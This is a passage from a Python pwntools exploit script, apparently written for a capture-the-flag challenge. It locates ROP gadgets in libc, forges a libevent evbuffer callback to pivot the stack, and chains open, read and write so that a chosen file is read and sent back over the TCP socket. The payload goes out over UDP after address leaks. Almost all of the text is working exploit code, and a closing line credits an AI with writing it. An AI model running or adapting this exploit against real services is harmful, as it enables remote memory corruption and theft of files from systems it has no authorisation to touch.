and g.insns[-1] == "ret"
and g.insns[0] == "pop rdi"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rsi_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rsi"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rax_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rax"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rdx_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rdx"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
call_sendto = pie_base + CALL_SENDTO_OFF
output_addr = pie_base+0x41e0
pivot_stack = output_addr + 0xB0
rop_addr = pivot_stack
# 0x41f0/0x4200 overlap this fake evbuffer, so place ROP data later.
path_addr = pie_base + 0x43C0
sockaddr_addr = pie_base + 0x43D0
read_buf = pie_base + 0x43E0
rop = ROP(libc)
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
call_sendto = pie_base + CALL_SENDTO_OFF
rop_chain = b""
rop_chain += pop_chain(rop, libc_base, "rdi", path_addr)
rop_chain += pop_chain(rop, libc_base, "rsi", 0)
rop_chain += p64(open_addr)
rop_chain += pop_chain(rop, libc_base, "rdi", READ_FD)
rop_chain += pop_chain(rop, libc_base, "rsi", read_buf)
rop_chain += pop_chain(rop, libc_base, "rdx", 0x50)
rop_chain += p64(read_addr)
# write(TCP_FD, read_buf, 0x50)
rop_chain += pop_chain(rop, libc_base, "rdi", TCP_FD)
rop_chain += pop_chain(rop, libc_base, "rsi", read_buf)
rop_chain += pop_chain(rop, libc_base, "rdx", 0x50)
rop_chain += p64(write_addr)
payload = b""
payload += request_blob() # ip 4byte
payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00") # 84byte
payload += p64(1) # tcp_io_ctx_use_bev = 1
payload += p64(fake_bev_addr) # tcp_io_ctx_bev = fake_bev_addr 0x40c0+base
payload += p64(0) # tcp fd = 0
payload += p64(leaks["global_event_base"]) # global_event_base = global_event_base
payload = payload.ljust(BSS_FAKE_BEV_OFF - UDP_IO_CTX_OFF, b"\x00") # fill to 0x40c0
# fake bev:
output_addr = pie_base+0x41e0
fake_cb = output_addr + 0x80
pivot_stack = output_addr + 0xB0
payload += cyclic(280) # 0x40c0 payload
payload += p64(output_addr) # output_addr
#---output construction:0x41e0 payload : evbuffer
# 0x41e0: fake evbuffer. This is enough for
# evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
# to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
payload += p64(0) # +0x00 first
payload += p64(0) # +0x08 last
payload += p64(output_addr) # +0x10 last_with_datap = &first
payload += p64(0) # +0x18 total_len
payload += p64(0) # +0x20 n_add_for_cb
payload += p64(0) # +0x28 n_del_for_cb
payload += p64(0) # +0x30 lock
payload += p64(0) # +0x38 flags: no freeze, no deferred callback
payload = payload.ljust((output_addr + 0x78) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += p64(fake_cb) # +0x78 callbacks.lh_first
payload += p64(0) # +0x80 cb_entry.next
payload += p64(0) # +0x88 cb_entry.prev
payload += p64(mov_rsp_rdx) # +0x90 cb_entry.cb_func
payload += p64(rop_addr) # +0x98 cb_entry.cbarg -> rdx
payload += p64(1) # +0xa0 EVBUFFER_CB_ENABLED
payload = payload.ljust(rop_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += rop_chain
payload = payload.ljust(path_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += FILE_PATH
payload = payload.ljust(sockaddr_addr - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += p16(socket.AF_INET)
payload += p16(leaks["udp_peer"][1], endian="big")
payload += socket.inet_aton(leaks["udp_peer"][0])
payload += b"\x00" * 8
return payload
def main():
tcp, udp = open_channels()
try:
leaks = leak_all(tcp, udp)
for name, value in leaks.items():
if isinstance(value, bytes):
log.info("%s (%#x bytes)", name, len(value))
print(hexdump(value))
elif isinstance(value, tuple):
log.success("%s = %s:%d", name, *value)
else:
log.success("%s = %#x", name, value)
payload = build_payload(leaks)
log.info("payload_len = %#x", len(payload))
#print(hexdump(payload))
udp.send(payload)
tcp.send(b"0.0.0.0\x00")
tcp.interactive()
finally:
if not args.INTERACTIVE:
tcp.close()
udp.close()
if __name__ == "__main__":
main()
全靠ai
